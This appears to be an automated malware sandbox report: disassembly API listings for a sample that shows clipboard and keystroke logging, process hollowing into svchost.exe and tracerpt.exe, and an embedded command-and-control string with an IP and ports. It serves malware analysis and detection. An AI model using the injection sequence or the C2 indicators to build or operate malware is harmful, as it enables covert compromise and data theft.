                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 418257734-0
                                                                                                                                                                      • Opcode ID: 9ba81a701cce433db93d3201aaa6458b7feb1eefe09dcbeb2de600b9bf0ba812
                                                                                                                                                                      • Instruction ID: e6c255c04c2e00166e273bee50597d4f1647cf6036632954b7c99c94a280edba
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ba81a701cce433db93d3201aaa6458b7feb1eefe09dcbeb2de600b9bf0ba812
                                                                                                                                                                      • Instruction Fuzzy Hash: ADE0ECB9944701EFEB18FBA5D909E7D7775AF44B11F200249E101AF2A1CB799940DB21
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C67181
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                        • Part of subcall function 02C67156: __getptd_noexit.LIBCMT ref: 02C6715B
                                                                                                                                                                        • Part of subcall function 02C67156: __freeptd.LIBCMT ref: 02C67165
                                                                                                                                                                        • Part of subcall function 02C67156: ExitThread.KERNEL32 ref: 02C6716E
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 02C671A2
                                                                                                                                                                        • Part of subcall function 02C69C41: __getptd_noexit.LIBCMT ref: 02C69C47
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 418257734-0
                                                                                                                                                                      • Opcode ID: d93decb55ab0ab3670bfeb01bdb2bc244de8e06d7b72f3416f03d9b24b16aa35
                                                                                                                                                                      • Instruction ID: 61291a28bc03332b9270f62ca6dddde4bf8b7b0f5b059ef5c5ac7fb4f3d83525
                                                                                                                                                                      • Opcode Fuzzy Hash: d93decb55ab0ab3670bfeb01bdb2bc244de8e06d7b72f3416f03d9b24b16aa35
                                                                                                                                                                      • Instruction Fuzzy Hash: EFE0ECB1900604AFE708ABA0C989E7D7776EF04705F204059E1025B2A1DA75A944FF24
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock.LIBCMT ref: 0378641B
                                                                                                                                                                        • Part of subcall function 03788E5B: __mtinitlocknum.LIBCMT ref: 03788E71
                                                                                                                                                                        • Part of subcall function 03788E5B: __amsg_exit.LIBCMT ref: 03788E7D
                                                                                                                                                                        • Part of subcall function 03788E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03783F06,0000000D,03796340,00000008,03783FFF,00000000,?,037810F0,00000000,03796278,00000008,03781155,?), ref: 03788E85
                                                                                                                                                                      • __tzset_nolock.LIBCMT ref: 0378642C
                                                                                                                                                                        • Part of subcall function 03785D22: __lock.LIBCMT ref: 03785D44
                                                                                                                                                                        • Part of subcall function 03785D22: ____lc_codepage_func.LIBCMT ref: 03785D8B
                                                                                                                                                                        • Part of subcall function 03785D22: __getenv_helper_nolock.LIBCMT ref: 03785DAD
                                                                                                                                                                        • Part of subcall function 03785D22: _free.LIBCMT ref: 03785DE4
                                                                                                                                                                        • Part of subcall function 03785D22: _strlen.LIBCMT ref: 03785DEB
                                                                                                                                                                        • Part of subcall function 03785D22: __malloc_crt.LIBCMT ref: 03785DF2
                                                                                                                                                                        • Part of subcall function 03785D22: _strlen.LIBCMT ref: 03785E08
                                                                                                                                                                        • Part of subcall function 03785D22: _strcpy_s.LIBCMT ref: 03785E16
                                                                                                                                                                        • Part of subcall function 03785D22: __invoke_watson.LIBCMT ref: 03785E2B
                                                                                                                                                                        • Part of subcall function 03785D22: _free.LIBCMT ref: 03785E3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1828324828-0
                                                                                                                                                                      • Opcode ID: ff007393626b9c7e30bf2768d0c731eac790686368c15427f3ddc110ff803dc2
                                                                                                                                                                      • Instruction ID: 5062776c0552e838523e6a64df50309f87d340ba2a8723a7e78542d60bc6959c
                                                                                                                                                                      • Opcode Fuzzy Hash: ff007393626b9c7e30bf2768d0c731eac790686368c15427f3ddc110ff803dc2
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0127D8C2B11E7CA26FBE1B64AB0CB2706BD8F35F90875AE65429484DA740241C663
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C64755
                                                                                                                                                                        • Part of subcall function 02C63260: __wcsrev.LIBCMT ref: 02C80655
                                                                                                                                                                      Strings
                                                                                                                                                                      • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C64750
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcsrevlstrlen
                                                                                                                                                                      • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                                                                      • API String ID: 4062721203-291094236
                                                                                                                                                                      • Opcode ID: 34d13ad8bcafab8ce877011e711ceb5f771b5f9e1a63b73d8a8a5f93b7c68d9d
                                                                                                                                                                      • Instruction ID: de45b46d7bb1ab293739d09cc163a8eda0f62893d8122cbf341fcb5404f13dad
                                                                                                                                                                      • Opcode Fuzzy Hash: 34d13ad8bcafab8ce877011e711ceb5f771b5f9e1a63b73d8a8a5f93b7c68d9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 22C08CB2288208CFF70036D59088B3C33A8EB23F55F608435E905CA402DA52CC1097F1
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCloseKey.ADVAPI32(80000001,03776E9A), ref: 03776EC9
                                                                                                                                                                      • RegCloseKey.ADVAPI32(75BF73E0), ref: 03776ED2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3660427363-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02C80693
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C7FAB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32 ref: 02C65EB2
                                                                                                                                                                        • Part of subcall function 02C66F17: _malloc.LIBCMT ref: 02C66F31
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 617756273-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E8A9
                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,?,0377604D), ref: 0377E8B3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E8BF
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0377E8D2
                                                                                                                                                                      • InterlockedExchange.KERNEL32(037A1F08,00000000), ref: 0377E8DA
                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 0377E8E2
                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0377E8EA
                                                                                                                                                                      • GlobalSize.KERNEL32(00000000), ref: 0377E8FB
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0377E90C
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377E985
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E9A3
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0377E9AC
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0377E9B2
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0377E9CA
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0377E9E4
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377EA02
                                                                                                                                                                      • lstrlenW.KERNEL32(03795B48,?,00000000), ref: 0377EA16
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,03795B48,00000000), ref: 0377EA25
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377EA2C
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377EA38
                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0377EABC
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4A8), ref: 0377EB0B
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB1D
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4D0), ref: 0377EB3E
                                                                                                                                                                      • lstrlenW.KERNEL32(0379B4D0), ref: 0377EB61
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB7F
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EB95
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377EBBF
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0377EC0B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0377EC21
                                                                                                                                                                      • CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0377EC3B
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377EC59
                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0377EC69
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0377EC74
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0377EC7B
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000), ref: 0377EC88
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                                                                      • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                                                                      • API String ID: 1637302245-2373594894
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03777804
                                                                                                                                                                      • _memset.LIBCMT ref: 03777850
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03777864
                                                                                                                                                                        • Part of subcall function 03778720: _vswprintf_s.LIBCMT ref: 03778731
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777893
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 037778DA
                                                                                                                                                                        • Part of subcall function 03777740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,037778FC), ref: 03777756
                                                                                                                                                                        • Part of subcall function 03777740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,037778FC,?,?,?,?,?,?,74DF0630), ref: 0377775D
                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377790A
                                                                                                                                                                      • _memset.LIBCMT ref: 03777923
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377793B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777944
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777956
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777959
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377796B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0377796E
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777980
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03777983
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 0377798B
                                                                                                                                                                      • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03777992
                                                                                                                                                                      • _memset.LIBCMT ref: 037779B4
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 037779CA
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 037779FF
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 03777A1B
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 03777A43
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 03777A58
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,037776F0,00001000,00000000), ref: 03777A72
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 03777A90
                                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 03777AA1
                                                                                                                                                                      • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03777ABA
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 03777AD6
                                                                                                                                                                      • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 03777AE8
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74DF0630), ref: 03777AF1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                      • API String ID: 4176418925-3213446972
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65849
                                                                                                                                                                      • _memset.LIBCMT ref: 02C65868
                                                                                                                                                                      • _memset.LIBCMT ref: 02C6589D
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02C658B1
                                                                                                                                                                        • Part of subcall function 02C659E0: _vswprintf_s.LIBCMT ref: 02C659F1
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 02C658E0
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02C65928
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C6594E
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C65968
                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C65987
                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C659A2
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 02C659C1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
• Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                                                                                      • API String ID: 2170139861-1986163084
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 03777E73
                                                                                                                                                                      • _memset.LIBCMT ref: 03777E9F
                                                                                                                                                                      • _memset.LIBCMT ref: 03777ED4
                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03777EE8
                                                                                                                                                                        • Part of subcall function 03778720: _vswprintf_s.LIBCMT ref: 03778731
                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 03777F15
                                                                                                                                                                      • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 03777F65
                                                                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 03777F92
                                                                                                                                                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 03777FAA
                                                                                                                                                                      • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 03777FCC
                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 03777FEA
                                                                                                                                                                      • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 03777FFF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
• Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                                                                                      • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                                                                                      • API String ID: 2170139861-2473635271
                                                                                                                                                                      APIs
